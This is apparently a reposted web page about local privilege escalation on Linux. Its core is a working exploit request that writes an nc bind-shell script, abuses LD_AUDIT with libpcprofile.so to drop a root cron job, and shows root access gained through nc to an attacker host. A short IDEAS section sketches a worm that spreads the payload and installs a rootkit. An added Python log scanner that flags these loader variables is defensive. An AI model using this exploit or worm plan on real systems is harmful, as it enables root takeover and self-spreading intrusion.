Local privilege escalation in non-interactive Linux environments: approach and reflections linux loca(2)

?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------

Looks like a wormable bug. The URL-obfuscated (IDS/IPS) worm searches for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil URL and does the same for other IPs. It installs a rootkit-bot and the game is over.

© Offensive Security 2010
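
A defender-side check for the request shown above, as an added example that is not part of the original post: it URL-decodes access-log request lines repeatedly, so the URL obfuscation mentioned under IDEAS does not hide the loader variables, then flags lines that set LD_AUDIT or PCPROFILE_OUTPUT. The log lines, function names and severity labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Loader variables and cron drop path taken from the request shown on this page.
ENV_ASSIGN = re.compile(r"\b(LD_AUDIT|PCPROFILE_OUTPUT)\s*=")
CRON_PATH = re.compile(r"/etc/cron(?:\.d|tab)\b")

# Constructed sample request lines (not real traffic).
SAMPLE_LOG = [
    "GET /index.php?id=42 HTTP/1.1",
    "GET /cmd.php?c=umask+0%3BLD_AUDIT%3D%22libpcprofile.so%22+"
    "PCPROFILE_OUTPUT%3D%22/etc/cron.d/exploit%22+ping HTTP/1.1",
    "GET /cmd.php?c=LD%255FAUDIT%253Dlibpcprofile.so+"
    "PCPROFILE%255FOUTPUT%253D%252Fetc%252Fcron.d%252Fx+ping HTTP/1.1",
    "GET /search?q=LD_AUDIT%3D+glibc HTTP/1.1",
    "GET /docs/cron.d-howto.html HTTP/1.1",
]

def decode_fully(value, max_rounds=5):
    """Undo nested URL encoding (%255F -> %5F -> _) before any matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return the set of indicator names present in one request line."""
    text = decode_fully(request_line)
    hits = {m.group(1) for m in ENV_ASSIGN.finditer(text)}
    if CRON_PATH.search(text):
        hits.add("CRON_PATH")
    return hits

def scan(lines):
    """Return [(line_number, severity, indicators)] for lines setting a loader variable."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits & {"LD_AUDIT", "PCPROFILE_OUTPUT"}:
            # A loader variable pointed at a cron path matches the pattern on this page.
            severity = "high" if "CRON_PATH" in hits else "review"
            findings.append((number, severity, sorted(hits)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A single-pass decoder would miss the third sample line, which is why matching runs only after decoding reaches a fixed point.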

Content copyright notice: unless otherwise noted, all articles are original to this site.

When reposting, credit the source: https://www.heiqu.com/wwszsp.html